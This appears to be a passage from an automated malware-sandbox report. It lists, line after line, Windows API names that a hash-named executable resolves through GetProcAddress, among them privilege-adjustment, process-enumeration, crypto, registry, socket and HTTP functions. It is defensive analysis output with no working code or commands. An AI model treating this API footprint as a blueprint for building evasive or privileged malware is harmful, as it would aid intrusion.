\"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RtlGetVersion (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter AddDllDirectory (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter EventRegister (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter EventSetInformation (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCallback (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RegisterShimImplCleanupCallback (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SetShellShimInstance (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter OnShimDllMainCalled (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter _CorExeMain_RetAddr (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter _CorExeMain (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter UrlIsW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoSizeW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetFileVersionInfoW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter VerQueryValueW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SetRuntimeInfo (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetProcessWindowStation (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetUserObjectInformationW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreateConfigStream_RetAddr (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetNumaHighestNodeNumber (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetSystemWindowsDirectoryW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter OpenProcessToken (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter InitializeAcl (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter AddAccessAllowedAce (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter FreeSid (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter AddSIDToBoundaryDescriptor (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreateBoundaryDescriptorW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreatePrivateNamespaceW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter OpenPrivateNamespaceW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter DeleteBoundaryDescriptor (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WerRegisterRuntimeExceptionModule (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RaiseException (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SetSystemFileCacheSize (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter NtSetSystemInformation (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter PrivIsDllSynchronizationHeld (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetProcessMemoryInfo (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CoInitializeEx (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CoGetContextToken (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetEnabledXStateFeatures (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter sxsJitStartup (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter jitStartup (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter getJit (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CryptAcquireContextW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter OpenThreadToken (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CryptImportKey (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CryptExportKey (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CryptCreateHash (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CryptHashData (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CryptGetHashParam (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CryptDestroyHash (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CryptDestroyKey (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultLocaleName (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetUserPreferredUILanguages (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPath (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SHGetFolderPathW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyEx (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetProcessExecutableHeap_RetAddr (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetACP (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter UnmapViewOfFile (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CompareStringOrdinal (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetFullPathName (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter OpenProcessTokenW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SortGetHandle (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SortCloseHandle (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter NtQuerySystemInformation (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesEx (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter SetThreadErrorMode (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreateFile (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetFileType (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter BCryptGetFipsAlgorithmMode (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CryptGetDefaultProviderW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CryptGenRandom (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreateEvent (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CreateEventW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RegQueryValueEx (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessIdW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValue (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter LookupPrivilegeValueW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivileges (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter AdjustTokenPrivilegesW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter OpenProcess (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter OpenProcessW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter EnumProcessModules (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter EnumProcessModulesW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetModuleInformation (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetModuleInformationW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseName (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetModuleBaseNameW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameEx (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameExW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceFrequency (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter QueryPerformanceCounter (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RasEnumConnections (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RasEnumConnectionsW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WSAStartup (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WSASocket (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WSASocketW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter setsockopt (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WSAEventSelect (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter ioctlsocket (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter closesocket (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WSAIoctl (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter FormatMessage (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter FormatMessageW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RasConnectionNotification (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RasConnectionNotificationW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter TraceRegisterExA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter TracePrintfExA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter OpenSCManagerA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter OpenServiceA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter QueryServiceStatus (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter CloseServiceHandle (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RegOpenCurrentUser (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RegNotifyChangeKeyValue (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter NotifyServiceStatusChangeA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WinHttpOpen (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WinHttpOpenW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WinHttpCloseHandle (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WinHttpCloseHandleW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter StrRChrA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetProductInfo (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter InitSecurityInterfaceW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter InitSecurityInterfaceA (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RpcStringBindingComposeW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RpcBindingFromStringBindingW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetAuthInfoExW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RpcBindingSetOption (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter RpcStringFreeW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WinHttpSetTimeouts (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WinHttpSetTimeoutsW (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter WinHttpGetIEProxyConfigForCurrentUser (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetAdaptersAddresses (UID: 00000000-00003656)\n \"e8901779b53e491d1f9f7b5406116f5927745ab46053a5f1f5c51463444ea4d9.exe\" called \"GetProcAddress\" with a parameter GetBestInterfaceEx (UID: 00000000-00003656)\n 